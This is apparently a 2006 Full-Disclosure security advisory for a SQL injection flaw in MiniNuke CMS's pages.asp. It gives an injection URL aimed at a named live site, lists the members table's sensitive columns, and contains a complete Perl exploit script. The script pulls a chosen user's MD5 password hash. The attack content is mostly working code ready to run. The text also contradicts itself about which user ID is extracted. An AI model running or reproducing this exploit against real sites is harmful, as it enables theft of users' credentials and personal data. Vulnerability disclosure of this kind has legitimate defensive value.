--Security Report-- Advisory: MiniNuke CMS System all versions (pages.asp) SQL Injection vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 19/02/06 10:31 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@nukedx.com Web: http://www.nukedx.com } --- Vendor: MiniNuke (www.miniex.net) (www.mini-nuke.info) Version: All versions released from this vendors. About:Via this method remote attacker can inject SQL query to the pages.asp --- How&Example: GET -> http://[site]/pages.asp?id=1%20[SQLQuery] Example -> http://www.eraymuzik.com/pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=1 So with this example remote attacker can get userid 52's hashed password. Columns of MEMBERS: uye_id = userid sifre = md5 password hash g_soru = secret question. g_cevap = secret answer email = mail address isim = name icq = ICQ Uin msn = MSN Sn. aim = AIM Sn. meslek = job cinsiyet = gender yas = age url = url imza = signature mail_goster = show mail :P avurl = avatar url avatar = avatar -- Exploit: http://www.nukedx.com/?getxpl=9 #!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Orginal advisory: http://www.nukedx.com/?viewdoc=9 #Usage: mini.pl use IO::Socket; if(@ARGV != 3){ print " +**********************************************************************+ +Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+ + Usage: mini.pl + + Example: mini.pl sux.com / 1 + + Method found & Exploit scripted by nukedx + +**********************************************************************+ "; exit(); } #Local variables $server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $port = "80"; $mndir = $ARGV[1]; $victimid = $ARGV[2]; $sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid; #Writing data to socket print "+**********************************************************************+\n"; print "+ Trying to connect: $server\n"; $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; print $mns "GET $sreq\n"; print $mns "Host: $server\n"; print $mns "Accept: */*\n"; print $mns "Connection: close\n\n"; print "+ Connected!...\n"; while($answer = <$mns>) { if ($answer =~ /([\d,a-f]{32})/) { print "+ USERID: $victimid\n"; print "+ MD5 HASH: $1\n"; print "+**********************************************************************+\n"; exit(); } if ($answer =~ /number of columns/) { print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n"; print "+ So please edit query by manually adding null data..\n"; exit(); } } print "+ Exploit failed\n"; print "+**********************************************************************+\n"; # nukedx.com [2006-02-19] -- Original advisory: http://www.nukedx.com/?viewdoc=9 -- >>From the NWPX team, nuker a.k.a nukedx _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/